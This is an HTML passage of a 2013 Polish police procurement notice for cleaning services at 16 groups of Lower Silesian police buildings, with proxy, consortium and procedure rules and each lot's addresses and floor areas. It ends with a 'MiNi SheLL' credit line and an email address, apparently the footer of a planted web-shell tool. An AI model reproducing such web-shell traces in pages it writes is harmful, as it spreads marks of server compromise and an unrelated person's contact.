5.	Pełnomocnictwo. Formularz ofertowy, oświadczenia, dokumenty, listy i informacje sporządzane bądź przygotowywane przez Wykonawcę powinny być podpisane przez osoby uprawnione do reprezentacji wykonawcy. W przypadku, gdy formularz ofertowy, oświadczenia, dokumenty, listy i informacje podpisują osoby, których uprawnienie do reprezentacji nie wynika z dokumentu określającego status prawny wykonawcy (np. odpis z właściwego rejestru), Zamawiający niniejszym wymaga, aby Wykonawca dołączył do oferty pełnomocnictwo w formie pisemnej (oryginał) lub jego kopię poświadczoną za zgodność z oryginałem przez notariusza.
6.	W przypadku wnoszenia oferty przez wspólników spółki cywilnej należy załączyć dodatkowo: 
6.1.	W przypadku, gdy oferta nie jest podpisana przez wszystkich wspólników - pełnomocnictwo wspólników do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy podpisane przez wszystkich wspólników lub ich prawnie upoważnionych przedstawicieli. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
7.	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum) 
7.1.	Na podstawie art. 23 ust. 2 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
7.2.	W związku z powyższym niezbędne jest przedłożenie w ofercie pełnomocnictwa ustanawiającego podmiot uprawniony (lidera) do występowania w imieniu konsorcjum, wraz z określeniem zakresu umocowania lidera  (pełnomocnictwo: do reprezentowania konsorcjum w prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy). Wymaga się, by pełnomocnictwo było podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów (konsorcjantów). Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
7.3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
7.4.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/Liderem.
7.5.	Zgodnie z art. 141 ustawy Pzp wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy. 
7.6.	Każdy z partnerów musi złożyć oświadczenie wykonawcy potwierdzające brak podstaw do wykluczenia wykonawcy z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych, którego wzór określa załącznik numer 5 do SIWZ, oraz ma obowiązek złożyć odnoszący się do niego dokument, wymieniony w punkcie 3.2.2. Rozdział VII SIWZ. 
7.7.	Wszystkie warunki udziału w postępowaniu, o których mowa w Rozdziale VII pkt 1 partnerzy winni spełniać łącznie.
7.8.	Zamawiający, w przypadku wybrania oferty złożonej przez wykonawców ubiegających się wspólnie, może żądać przedstawienia umowy regulującej współpracę tych wykonawców przed zawarciem umowy w sprawie zamówienia publicznego.
8.	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba  że mimo, ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
9.	Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dolnoslaska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji we Wrocławiu
Wydział Zamówień Publicznych i Funduszy Pomocowych
Ul. Podwale 31-33, 50-040 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 11:15, miejsce: Komenda Wojewódzka Policji we Wrocławiu
Wydział Zamówień Publicznych i Funduszy Pomocowych
Ul. Podwale 31-33, 50-040 Wrocław
(Punkt Obsługi Klienta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 3.1.	Część 1 zamówienia: Komenda Wojewódzka Policji we Wrocławiu  ul. Podwale 31-33, 50-040 Wrocław. Powierzchnia kompleksowego sprzątania: 1033,08m2; oraz Komenda Wojewódzka Policji ul. Połbina 1 (Budynek E), 54-151 Wrocław. Powierzchnia kompleksowego sprzątania: 3 033,80m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.	Część 1 zamówienia: Komenda Wojewódzka Policji we Wrocławiu  ul. Podwale 31-33, 50-040 Wrocław. Powierzchnia kompleksowego sprzątania: 1033,08m2; oraz Komenda Wojewódzka Policji ul. Połbina 1 (Budynek E), 54-151 Wrocław. Powierzchnia kompleksowego sprzątania: 3 033,80m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 3.2.	Część 2 zamówienia: Komenda Miejska Policji w Wałbrzychu II KP, ul. Psie Pole 7, 58-301 Wałbrzych. Powierzchnia kompleksowego sprzątania: 296m2; oraz Komenda Miejska Policji w Wałbrzychu PDOZ, ul. Mazowiecka 2, 58-300 Wałbrzych. Powierzchnia kompleksowego sprzątania: 402,7m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2.	Część 2 zamówienia: Komenda Miejska Policji w Wałbrzychu II KP, ul. Psie Pole 7, 58-301 Wałbrzych. Powierzchnia kompleksowego sprzątania: 296m2; oraz Komenda Miejska Policji w Wałbrzychu PDOZ, ul. Mazowiecka 2, 58-300 Wałbrzych. Powierzchnia kompleksowego sprzątania: 402,7m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3.3.	Część 3 zamówienia: Komenda Miejska Policji w Legnicy, ul. Stroma 4, 59-220 Legnica. Powierzchnia kompleksowego sprzątania: 216m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.3.	Część 3 zamówienia: Komenda Miejska Policji w Legnicy, ul. Stroma 4, 59-220 Legnica. Powierzchnia kompleksowego sprzątania: 216m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 3.4.	Część 4 zamówienia: Komenda Powiatowa Policji w Złotoryi R-ID Świerzawa, ul. Złotoryjska 23, 59-540 Świerzawa. Powierzchnia kompleksowego sprzątania: 156m2; oraz Komenda Powiatowa Policji w Złotoryi - PPI Wojcieszów ul. Chrobrego 67, 59-550 Wojcieszów. Powierzchnia kompleksowego sprzątania: 85m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.4.	Część 4 zamówienia: Komenda Powiatowa Policji w Złotoryi R-ID Świerzawa, ul. Złotoryjska 23, 59-540 Świerzawa. Powierzchnia kompleksowego sprzątania: 156m2; oraz Komenda Powiatowa Policji w Złotoryi - PPI Wojcieszów ul. Chrobrego 67, 59-550 Wojcieszów. Powierzchnia kompleksowego sprzątania: 85m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 3.5.	Część 5 zamówienia: Komenda Powiatowa Policji w Polkowicach RD w Gaworzycach, ul. Główna 16 A, 59-180 Gaworzyce. Powierzchnia kompleksowego sprzątania:  172,76m2; oraz Komenda Powiatowa Policji w Polkowicach RD w Grębocicach, ul. Bankowa 2, 59-150 Grębocice. Powierzchnia kompleksowego sprzątania: 72m2; oraz Komenda Powiatowa Policji w Polkowicach RD w Radwanicach ul. Przemysłowa 21, 59-160 Radwanice. Powierzchnia kompleksowego sprzątania: 98m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.5.	Część 5 zamówienia: Komenda Powiatowa Policji w Polkowicach RD w Gaworzycach, ul. Główna 16 A, 59-180 Gaworzyce. Powierzchnia kompleksowego sprzątania:  172,76m2; oraz Komenda Powiatowa Policji w Polkowicach RD w Grębocicach, ul. Bankowa 2, 59-150 Grębocice. Powierzchnia kompleksowego sprzątania: 72m2; oraz Komenda Powiatowa Policji w Polkowicach RD w Radwanicach ul. Przemysłowa 21, 59-160 Radwanice. Powierzchnia kompleksowego sprzątania: 98m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 3.6.	Część 6 zamówienia: Komenda Powiatowa Policji w Kłodzku RD w Szczytnej, ul. Wolności 42,  57-330 Szczytna. Powierzchnia kompleksowego sprzątania: 43,53m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.6.	Część 6 zamówienia: Komenda Powiatowa Policji w Kłodzku RD w Szczytnej, ul. Wolności 42,  57-330 Szczytna. Powierzchnia kompleksowego sprzątania: 43,53m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 3.7.	Część 7 zamówienia: Komenda Powiatowa Policji w Kłodzku PP w Międzylesiu, ul. Graniczna 3, 57-530 Międzylesie. Powierzchnia kompleksowego sprzątania: 198,12m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.7.	Część 7 zamówienia: Komenda Powiatowa Policji w Kłodzku PP w Międzylesiu, ul. Graniczna 3, 57-530 Międzylesie. Powierzchnia kompleksowego sprzątania: 198,12m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 3.8.	Część 8 zamówienia: Komenda Powiatowa Policji w Kłodzku  KP w Kudowie Zdrój, ul. Zdrojowa 25, 57-350 Kudowa Zdrój. Powierzchnia kompleksowego sprzątania: 396,20m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.8.	Część 8 zamówienia: Komenda Powiatowa Policji w Kłodzku  KP w Kudowie Zdrój, ul. Zdrojowa 25, 57-350 Kudowa Zdrój. Powierzchnia kompleksowego sprzątania: 396,20m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> 3.9.	Część 9 zamówienia: Komenda Powiatowa Policji w Kłodzku  PP  w Dusznikach  Zdrój, ul. Rynek 6, 57-340 Duszniki Zdrój. Powierzchnia kompleksowego sprzątania: 68,5m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.9.	Część 9 zamówienia: Komenda Powiatowa Policji w Kłodzku  PP  w Dusznikach  Zdrój, ul. Rynek 6, 57-340 Duszniki Zdrój. Powierzchnia kompleksowego sprzątania: 68,5m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> 3.10.	Część 10 zamówienia: Komenda Powiatowa Policji w Kłodzku  PP w Stroniu Śląskim, ul. Mickiewicza 2,  57-550 Stronie Śląskie. Powierzchnia kompleksowego sprzątania: 99,95m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.10.	Część 10 zamówienia: Komenda Powiatowa Policji w Kłodzku  PP w Stroniu Śląskim, ul. Mickiewicza 2,  57-550 Stronie Śląskie. Powierzchnia kompleksowego sprzątania: 99,95m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> 3.11.	Część 11 zamówienia: Komenda Powiatowa Policji w Strzelinie  PP w Wiązowie, ul. Pocztowa 2, 57-120 Wiązów. Powierzchnia kompleksowego sprzątania: 194,92m2. Powierzchnia terenu zewnętrznego: 12m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.11.	Część 11 zamówienia: Komenda Powiatowa Policji w Strzelinie  PP w Wiązowie, ul. Pocztowa 2, 57-120 Wiązów. Powierzchnia kompleksowego sprzątania: 194,92m2. Powierzchnia terenu zewnętrznego: 12m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> 3.12.	Część 12 zamówienia: Komenda Miejska Policji w Jeleniej Górze, ul. Spółdzielcza 43, 58-500 Jelenia Góra. Powierzchnia kompleksowego sprzątania: 668,20m2. Powierzchnia terenu zewnętrznego: 38,32m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.12.	Część 12 zamówienia: Komenda Miejska Policji w Jeleniej Górze, ul. Spółdzielcza 43, 58-500 Jelenia Góra. Powierzchnia kompleksowego sprzątania: 668,20m2. Powierzchnia terenu zewnętrznego: 38,32m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> 3.13.	Część 13 zamówienia: Komenda Miejska Policji w Jeleniej Górze KP  w Szklarskiej Porębie ul. Buczka 1, 58-580 Szklarska Poręba. Powierzchnia kompleksowego sprzątania: 605,55m2. Powierzchnia terenu zewnętrznego: 761,05m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.13.	Część 13 zamówienia: Komenda Miejska Policji w Jeleniej Górze KP  w Szklarskiej Porębie ul. Buczka 1, 58-580 Szklarska Poręba. Powierzchnia kompleksowego sprzątania: 605,55m2. Powierzchnia terenu zewnętrznego: 761,05m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> 3.14.	Część 14 zamówienia: Komenda Miejska Policji w Jeleniej Górze RD Podgórzyn, ul. Żołnierska 13a, 58-562 Podgórzyn. Powierzchnia kompleksowego sprzątania: 13,48m2; oraz Komenda Miejska Policji w Jeleniej Górze KP w Karpaczu, ul. Obrońców Pokoju 2b, 58-540 Karpacz. Powierzchnia kompleksowego sprzątania: 746,11m2 Powierzchnia terenu zewnętrznego: 1101,68m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.14.	Część 14 zamówienia: Komenda Miejska Policji w Jeleniej Górze RD Podgórzyn, ul. Żołnierska 13a, 58-562 Podgórzyn. Powierzchnia kompleksowego sprzątania: 13,48m2; oraz Komenda Miejska Policji w Jeleniej Górze KP w Karpaczu, ul. Obrońców Pokoju 2b, 58-540 Karpacz. Powierzchnia kompleksowego sprzątania: 746,11m2 Powierzchnia terenu zewnętrznego: 1101,68m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> 3.15.	Część 15 zamówienia: Komenda Miejska Policji w Jeleniej Górze PPI Mysłakowicach, ul. Szkolna 5, 58-533 Mysłakowice. Powierzchnia kompleksowego sprzątania: 43,45m2; oraz Komenda Miejska Policji w Jeleniej Górze KP w Kowarach, ul. Sienkiewicza 7, 58-530 Kowary. Powierzchnia kompleksowego sprzątania: 452,49m2. Powierzchnia terenu zewnętrznego (zamiatanie i odśnieżanie wg potrzeb): 938,32m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.15.	Część 15 zamówienia: Komenda Miejska Policji w Jeleniej Górze PPI Mysłakowicach, ul. Szkolna 5, 58-533 Mysłakowice. Powierzchnia kompleksowego sprzątania: 43,45m2; oraz Komenda Miejska Policji w Jeleniej Górze KP w Kowarach, ul. Sienkiewicza 7, 58-530 Kowary. Powierzchnia kompleksowego sprzątania: 452,49m2. Powierzchnia terenu zewnętrznego (zamiatanie i odśnieżanie wg potrzeb): 938,32m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> 3.16.	Część 16 zamówienia: Komenda Powiatowa Policji Głogowie RD III, pl. 1000-lecia 1,  67-200 Głogów. Powierzchnia kompleksowego sprzątania: 81m2; oraz Komenda Powiatowa Policji Głogowie RD II, ul. Budziszyńska 9 A, 67-200 Głogów. Powierzchnia kompleksowego sprzątania: 112m2; oraz  KPP Głogów RD I, ul. Kosmonautów Polskich 3-5, 67-200 Głogów. Powierzchnia kompleksowego sprzątania: 146m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.16.	Część 16 zamówienia: Komenda Powiatowa Policji Głogowie RD III, pl. 1000-lecia 1,  67-200 Głogów. Powierzchnia kompleksowego sprzątania: 81m2; oraz Komenda Powiatowa Policji Głogowie RD II, ul. Budziszyńska 9 A, 67-200 Głogów. Powierzchnia kompleksowego sprzątania: 112m2; oraz  KPP Głogów RD I, ul. Kosmonautów Polskich 3-5, 67-200 Głogów. Powierzchnia kompleksowego sprzątania: 146m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com